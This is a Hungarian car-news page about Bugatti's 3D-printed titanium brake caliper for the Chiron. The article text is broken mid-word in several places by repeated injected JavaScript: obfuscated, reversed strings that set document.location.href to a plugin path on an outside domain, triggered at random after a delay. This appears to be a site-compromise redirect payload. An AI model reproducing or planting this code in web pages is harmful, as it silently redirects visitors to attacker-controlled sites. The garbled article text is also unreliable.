Kezdőlap Férfi 3D nyomtatással alkotta meg a világ legnagyobb féknyergét a Bugatti

3D nyomtatással alkotta meg a világ legnagyobb féknyergét a Bugatti

A sorozatgyártású autók világában eddig még soha nem látoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott nyolcdugattyús, monobloc nyereg titán segítségével lett páratlanul könnyű: a Chiron jelenleg használt alumínium megoldásánál közel két kilogrammal kevesebbet nyom (mindösszesen 2,9 kg). Ez egyébként a titánból 3D-nyomtatással valaha készült legnagyobb működő elem. Egyetlen ilyen féknyereg elkészítése 45 órás folyamat, melynek során a titánport négy darab 400 wattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos lézer olvasztja fel, majd a „nyomtató” 2213 rétegből megalkotja a szóban forgó alkatrészt. Ezzel nincs vége: hőkezeléssel még erősebbé teszik a féknyerget, a felületét pedig elsimítják. A hosszú folyamat végén egy olyan féknyereg áll elő, amely nem csak könnyebb, de sokkal erősebb is annál,…

- Hirdetés -
MEGOSZTÁS
- Hirdetés -